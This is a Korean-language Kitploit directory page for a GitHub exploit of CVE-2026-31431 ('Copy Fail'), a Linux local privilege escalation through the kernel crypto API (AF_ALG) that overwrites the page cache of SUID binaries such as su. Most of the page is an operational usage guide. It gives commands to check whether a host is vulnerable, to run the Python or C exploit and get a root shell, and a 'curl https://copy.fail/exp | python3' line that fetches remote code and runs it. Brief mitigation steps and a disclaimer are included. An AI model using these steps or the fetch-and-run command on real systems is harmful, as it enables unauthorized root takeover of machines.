Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — 대부분의 Linux LPE는 레이스 윈도우(race window)나 커널별 오프셋이 필요합니다. Copy Fail은 직선형 로직 결함으로, 둘 다 필요하지 않습니다. 동일한 732바이트 Python 스크립트(또는 .c elf)는 2017년 이후 출시된 모든 Linux 배포판을 루트 권한으로 탈취합니다. | Kitploit
도구/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

대부분의 Linux LPE는 레이스 윈도우(race window)나 커널별 오프셋이 필요합니다. Copy Fail은 직선형 로직 결함으로, 둘 다 필요하지 않습니다. 동일한 732바이트 Python 스크립트(또는 .c elf)는 2017년 이후 출시된 모든 Linux 배포판을 루트 권한으로 탈취합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1082294개월 전Kitploit 검토 완료

Copy Fail (CVE-2026-31431) – 익스플로잇 사용 가이드

⚠️ 면책 조항

본 콘텐츠는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 명시적인 허가 없이 시스템에서 실행하지 마십시오.


📌 개요

**Copy Fail (CVE-2026-31431)**은 AF_ALG를 통해 커널 crypto API에 영향을 미치는 Linux 로컬 권한 상승(LPE) 취약점입니다.

이 취약점을 통해 권한이 없는 사용자가 SUID 바이너리(예: /usr/bin/su)의 페이지 캐시 데이터를 덮어쓰고 루트 액세스 권한을 얻을 수 있습니다.


🧠 요구 사항

시스템 요구 사항

  • Linux 커널(취약한 버전 – 패치 상태에 따라 다름)
  • AF_ALG 활성화
  • algif_aead 모듈 로드

Python 익스플로잇 요구 사항

  • Python 3.10 이상
  • 다음 지원 필요:
    • os.splice
    • socket(AF_ALG)

🔍 취약점 확인

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

예상 지표:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead 로드됨

🐍 Python 익스플로잇 실행

1. 직접 실행

root@kitploit:~
python3 copy_fail_exp.py

2. 또는 curl 사용(원격 호스팅 시)

root@kitploit:~
curl https://copy.fail/exp | python3

3. 루트 셸 트리거

root@kitploit:~
su
id

예상 결과:

root@kitploit:~
uid=0(root)

⚠️ 일반적인 문제 (Python)

❌ 오류: os.splice not found

원인:

  • Python 버전 < 3.10
  • 제한된 빌드

해결 방법:

  • 최신 Python 바이너리 사용
  • 정적 Python 인터프리터 업로드

⚙️ C 버전 컴파일

1. 컴파일

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 실행 권한 부여

root@kitploit:~
chmod +x copy_fail

3. 익스플로잇 실행

root@kitploit:~
./copy_fail
su

⚠️ 일반적인 문제 (C)

❌ 익스플로잇 실행되지만 루트 권한 없음

가능한 원인:

  • 커널 패치됨
  • 잘못된 오프셋
  • 환경 불일치

❌ 컴파일 오류

필요한 도구 설치:

root@kitploit:~
apt update && apt install build-essential

🧪 문제 해결

시스템 패치 여부 확인

root@kitploit:~
dmesg | grep -i alg

모듈 확인

root@kitploit:~
lsmod | grep algif_aead

🛡️ 완화 조치

취약한 모듈 비활성화

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

커널 패치 적용

시스템 업데이트:

root@kitploit:~
apt update && apt upgrade

📌 참고 사항

  • 익스플로잇은 페이지 캐시만 수정합니다(비영구적)
  • 로컬 액세스 필요
  • 기본적으로 원격 익스플로잇 불가

🧠 최종 통찰

익스플로잇이 실패할 경우 다음을 고려하세요:

  • 커널이 이미 패치됨
  • 환경 제한
  • 대체 권한 상승 벡터(SUID, capabilities, sudo 설정 오류)

📚 참고 자료

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 작성자 메모

랩, CTF 및 승인된 펜테스트에서만 이 익스플로잇을 책임감 있게 사용하십시오.

도구 다운로드